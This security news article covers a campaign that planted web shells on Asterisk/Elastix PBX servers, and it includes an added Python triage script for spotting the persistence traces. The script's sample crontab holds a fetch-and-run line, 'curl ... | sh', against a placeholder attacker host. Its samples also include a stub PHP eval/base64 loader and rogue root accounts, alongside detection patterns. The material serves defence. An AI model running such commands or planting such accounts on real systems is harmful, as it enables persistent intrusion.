VoIP Servers targeted by Hackers by exploiting Digium Phone Software

An attack campaign has targeted VoIP phones running Digium's software in order to drop a web shell on their servers. The web shell is designed to exfiltrate data and to download and execute additional payloads.

According to the reports, the malware first installs multilayer-obfuscated PHP backdoors on the web server's file system, then downloads new payloads for execution and schedules recurring tasks to re-infect the host.

The activity is said to have begun in mid-December 2021. It targets Asterisk, a widely used software implementation of a private branch exchange (PBX), running on the open-source Elastix Unified Communications Server.

Reports stated that the intrusions resemble the INJ3CTOR3 campaign disclosed in November 2020 by Check Point, an Israeli cyber security firm, which suggests that the earlier campaign may have resurfaced.

The sudden surge coincides with the December 2021 public disclosure of a now-patched remote code execution flaw in FreePBX, a web-based open-source GUI for controlling and managing Asterisk. The issue is tracked as CVE-2021-45461 and rated 9.8 out of 10 in severity.

The attack begins by retrieving an initial dropper shell script from a remote server. That script installs the PHP web shell in several locations in the file system and also creates two root user accounts to maintain remote access.

A scheduled task is also created that runs every minute, fetching a fresh copy of the shell script from the attacker-controlled domain and executing it.
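As an added defender-side example (not code from the article or from the researchers it cites), the following Python helpers look for the three persistence traces described above on a Linux PBX host: extra UID-0 accounts, a cron job that runs every minute and pulls remote content into a shell, and PHP files built from obfuscation and execution primitives. The sample passwd, crontab and PHP inputs, and the attacker domain, are constructed placeholders.

```python
"""Triage helpers for the persistence traces described above (added example)."""
import re

# Constructed samples standing in for /etc/passwd, the root crontab and a PHP file.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "asterisk:x:100:101::/var/lib/asterisk:/sbin/nologin\n"
    "sysadm:x:0:0::/root:/bin/bash\n"            # extra UID-0 account: suspicious
    "elastix:x:0:0::/home/elastix:/bin/bash\n"   # extra UID-0 account: suspicious
)
SAMPLE_CRONTAB = (
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"   # benign nightly job
    "* * * * * curl -s http://ATTACKER-DOMAIN-PLACEHOLDER/x.sh | sh\n"  # minutely re-fetch
)
SAMPLE_PHP = '<?php eval(gzinflate(base64_decode("PAYLOAD-PLACEHOLDER")));'

def extra_uid0_accounts(passwd_text):
    """Return every account other than 'root' whose UID is 0."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits

MINUTELY = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(.+)$")
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*(https?://|\|\s*(sh|bash)\b)")

def minutely_remote_jobs(crontab_text):
    """Return commands that run every minute and pull content from a remote host."""
    hits = []
    for line in crontab_text.splitlines():
        m = MINUTELY.match(line.strip())
        if m and REMOTE_FETCH.search(m.group(1)):
            hits.append(m.group(1))
    return hits

OBFUSCATION = ("eval(", "base64_decode(", "gzinflate(", "gzuncompress(", "str_rot13(")

def php_obfuscation_markers(source):
    """Return the execution/decoding primitives present in a PHP source string."""
    return [fn for fn in OBFUSCATION if fn in source]

if __name__ == "__main__":
    # On a real host, feed in /etc/passwd, `crontab -l` output and web-root files instead.
    print("extra UID-0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
    print("minutely remote jobs:", minutely_remote_jobs(SAMPLE_CRONTAB))
    print("PHP obfuscation markers:", php_obfuscation_markers(SAMPLE_PHP))
```

A hit from any of the three checks is a triage lead, not proof of compromise; legitimate administration scripts occasionally use `base64_decode` or minutely cron jobs, so each finding should be reviewed against the host's known configuration.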

The malware also lets the attackers run arbitrary commands, take control of the system, steal information, and maintain a backdoor into the compromised hosts.

Researchers noted that this is a common approach used by malicious actors to launch exploits or run commands remotely.
